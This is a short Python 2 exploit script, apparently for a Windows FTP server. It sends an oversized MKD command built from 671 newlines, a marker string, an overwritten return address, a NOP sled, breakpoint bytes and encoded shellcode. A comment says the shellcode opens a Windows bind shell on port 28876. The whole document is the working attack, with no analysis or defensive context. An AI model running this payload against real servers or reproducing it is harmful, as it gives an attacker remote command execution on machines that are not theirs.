Untitled

#!/usr/bin/env python


# cesar_dbg.py
from socket import *
import struct

eip = struct.pack('<i',0x77D8AF0A)
host = "ip"
port = 21
user = "ftp"
password = "ftp"

# Shellcode will open windows shell on port 28876
shellcode = (
"\xd9\xcc\xb8\x84\x3b\xe0\x15\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x36\x31\x42\x19\x03\x42\x19\x83\xc2\x04\x66\xce\xd1\xdc\x02"
"\xba\x63\xef\x41\xca\x8f\x84\x23\x2f\x1b\xf4\xc3\xc4\x65\x29"
"\x58\xec\xa1\x66\x46\x64\x21\x29\x1e\xb4\x9a\xf9\xec\xd0\x42"
"\xa8\x67\x52\xe3\xe3\x08\x9d\x6b\x82\xf0\x2b\x88\xbc\x30\x7a"
"\x43\x37\x2f\xab\xa8\xe2\xee\x05\x0e\xa2\xa7\xf4\x13\xab\x6b"
"\x53\x5c\xbf\x2e\xa7\xe8\xe3\xcd\xaf\xef\xf0\x66\x04\xd0\x07"
"\x91\xcd\x21\xda\x23\x79\x75\x4b\xa2\x93\xc2\x5d\x08\x5f\x5a"
"\x8a\x94\x9c\xed\xbf\xe3\xe7\x2a\x35\xe0\x46\xbe\xfe\xd2\x77"
"\x29\x0f\xad\x6c\xf8\x9b\x9a\x90\xfb\x72\x95\x41\xf8\x80\x34"
"\x3a\x7f\xb6\x3f\x48\x88\x4a\x61\xb6\xdb\xab\x4d\xe1\x4e\xd3"
"\x53\x7d\x04\x65\xf5\x2c\x19\x55\xa4\xd0\x36\xc3\x37\x01\x49"
"\x13\xb8\x6d\xdf\xfc\x91\x3c\x4a\x02\xcd\xba\xb5\x88\x15\xf5"
"\xe7\x23\x8d\x95\x6a\xa0\x6d\xd7\x09\x0c\x55\x4c\x5a\xe7\x63"
"\xd5\x74\xf9\x3f\x5d\xba\xde\xe8\x33\x91\x4c\xd0\xf3\xfa\x79"
"\x8b\xa9\x56\x2d\x61\xb1\x01\x35\x0e\x0b\x52\x5c\xda\x6b\x55"
"\x60")

print "Lenght of shellcode: %d" % (len(shellcode))

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)
s.send("pass %s\r\n" % (password))
print s.recv(1024)


buffer = "MKD "         # Command
buffer += "\n" * 671    # Required parameter
buffer += "OMG"         # 3 bytes alpha char, also required
buffer +=  eip          # Control EIP
buffer += "\x90" * 10
buffer += "\xcc\xcc\xcc\xcc"    # INT 3, break / pause the execution
buffer += shellcode     # Payload
buffer += "\r\n"        # Another required parameter


print "Lenght of buffer: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)
s.close()